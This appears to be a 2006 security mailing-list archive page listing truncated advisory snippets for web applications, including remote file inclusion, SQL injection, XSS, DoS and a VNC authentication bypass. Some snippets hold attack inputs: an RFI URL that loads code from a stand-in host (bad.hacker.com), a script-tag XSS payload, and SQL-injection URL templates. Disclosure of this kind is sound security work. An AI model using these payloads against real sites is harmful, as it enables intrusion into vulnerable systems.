[Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability
2006-06-22 mac68k gmail com

phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln
2006-06-22 rozowa landrynka spam nation pl
PHPBlueDragon CMS <= 2.9.1
http://phpbluedragon.net/
Affected files:
root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPat

[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
2006-06-22 the_day echo or id
ECHO.OR.ID ECHO_ADV_34$2006
---------------------------------------------------------------------------
[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
---------------------------------------------------------------------------

WBB<<---v2.3.1"report.php" SQL Injection
2006-06-22 CrAzY CrAcKeR hotmail com
========================================
Discovered By: CrAzY CrAcKeR
Site:www.alshmokh.com
I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Breeeeh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
========================================
Example:- /report.php?postid=[SQL]
========

Re: Opera 9 DoS PoC
2006-06-22 Darren Clarke (mailcentre2 gmail com)
Tested and confirmed on Opera 9.00 built 8482. Interesting this also managed to crash Notepad.exe on Windows XP SP2 Home Edition when viewing the source of the page in IE7 Beta 2.
Darren Clarke
IT / Comms Admin
---------------------------------------------------------------------
Critical Security

[KAPDA]MyBB1.1.3~Option update for code buttons~Sql Injection Admin Access
2006-06-22 addmimistrator gmail com
ORIGINAL ADVISORY:
http://myimei.com/security/2006-06-21/mybb113option-update-for-code-buttonssql-injection-admin-access.html
http://www.kapda.ir/page-advisory.html
-Summary-
Software: MyBB
Software's Web Site: http://www.mybboard.com
Versions: 1.1.3
Class: Remote
Status: Patche

Dating biz@ dating script v1.0 - XSS
2006-06-22 luny youfucktard com
Custom dating biz@ dating script v1.0
Homepage: http://www.e-cbd.biz/php_dating_script.html
Affected files:
*Profiles
user_view.php
photo_create.php
---------------------------------
The edit profile form can be spoofed and a user can enter any data he wishes and it will update his p

WBB<<---v1.2 "showmods.php" SQL Injection
2006-06-22 CrAzY CrAcKeR hotmail com
========================================
Discovered By: CrAzY CrAcKeR
Site:www.alshmokh.com
I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Breeeeh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
========================================
Example:- /showmods.php?boardid=[SQL]
=====

Linux VNC evil client patch - BID 17978
2006-06-23 embyte madlab it
Hi all, I have done a patch to current Linux VNC client (ver. 4.1.1), which permit to authenticate to a bugged server with a NULL session, although password authentication is required (RealVNC Remote Authentication Bypass Vulnerability, BID 17978). Here is the patch for file CConnection.cxx $

rPSA-2006-0110-1 kernel
2006-06-23 Justin M. Forbes (jmforbes rpath com)
rPath Security Advisory: 2006-0110-1
Published: 2006-06-23
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification: Remote Deterministic Denial of Service
Updated Versions: kernel=/conary.rpath.com@rpl:devel//1/2.6.16.22-0.1-1
References: http://www.cve.mitre.org/cgi-bin/cv

Re: Re: PHP security (or the lack thereof)
2006-06-21 nabiy hotmail com (1 replies)
Trying to make the language 'safe' won't fix it because the language is not the problem. The real problem is the way PHP is presented to most new developers. PHP has been introduced as a tool for the web developer. As a language its goal is "to allow web developers to write dynamically generated

[Kil13r-SA-20060622-1] NetSoft SmartNet 2.0 Cross-Site Scripting Vulnerability
2006-06-22 mac68k gmail com

Re: Bypassing of web filters by using ASCII
2006-06-23 Amit Klein (AKsecurity) (aksecurity hotpop com)
On 23 Jun 2006 at 10:35, Vincent Archer wrote:
> On Fri, Jun 23, 2006 at 12:08:56AM +0200, Amit Klein (AKsecurity) wrote:
> > So what I don't understand now is why IE's "solution" is any better than Opera/Firefox?
> >
> > Why is modifying the data (msb) any better than modifying the data-descripti

Cisco Secure ACS Weak Session Management Vulnerability
2006-06-23 Darren Bounds (dbounds gmail com)
Cisco Secure ACS Weak Session Management Vulnerability
June 23, 2006
Product Overview: Cisco Secure Access Control Server (ACS) provides a centralized identity networking solution and simplified user management experience across all Cisco devices and security management applications. Cisco Secure

Dating Agent PRO 4.7.1 Vulnerability
2006-06-22 securityconnection gmail com
Dating Agent PRO 4.7.1
http://www.datetopia.com/datingagent/
--------------------------------------
-------------
PHPinfo page
/requirements.php
-------------
SQL injection
-------------
http://target.xx/picture.php?pid=1[SQL]
http://target.xx/mem.php?mid=1[SQL]
http://target.xx/search.ph

SYMSA-2006-005
2006-06-22 research symantec com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory
Advisory ID : SYMSA-2006-005
Advisory Title: Lanap CAPTCHA bypass exposure
Author : Michael White, michael_white (at) symantec (dot) com and Graham Murphy, g

Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability
2006-06-23 Darren Bounds (dbounds gmail com)
Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability
June 23, 2006
Product Overview: Trend Micro Control Manager is a centralized, web-based outbreak management console designed to simplify enterprise-wide coordination of outbreak security actions and management of Trend Micro products a

aeDating 4.1 XSS
2006-06-22 securityconnection gmail com
Product of AEwebworks Dating Software
http://www.aewebworks.com/
---------------------------
Cross Site Scripting (XSS)
---------------------------
http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test /)</script>&Mode=last
^"G4" Template work^
---
POST /join_form.php HTTP/

Re: Re: MS Excel Remote Code Execution POC Exploit
2006-06-23 Juha-Matti Laurio (juha-matti laurio netti fi)
"Steven M. Christey" <coley (at) mitre (dot) org> wrote:
> >
> > * Advisories:
> > * http://www.microsoft.com/technet/security/advisory/921365.mspx
> > * http://www.securityfocus.com/bid/18422/
>
> There are at least three separate Excel issues that were published in
> the past week. These references sugg

[Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/21 - Discovery
2006/06/21 - Vendor notification
2006/06/21 - Vendor response
2006/06/22 - Release
Affected version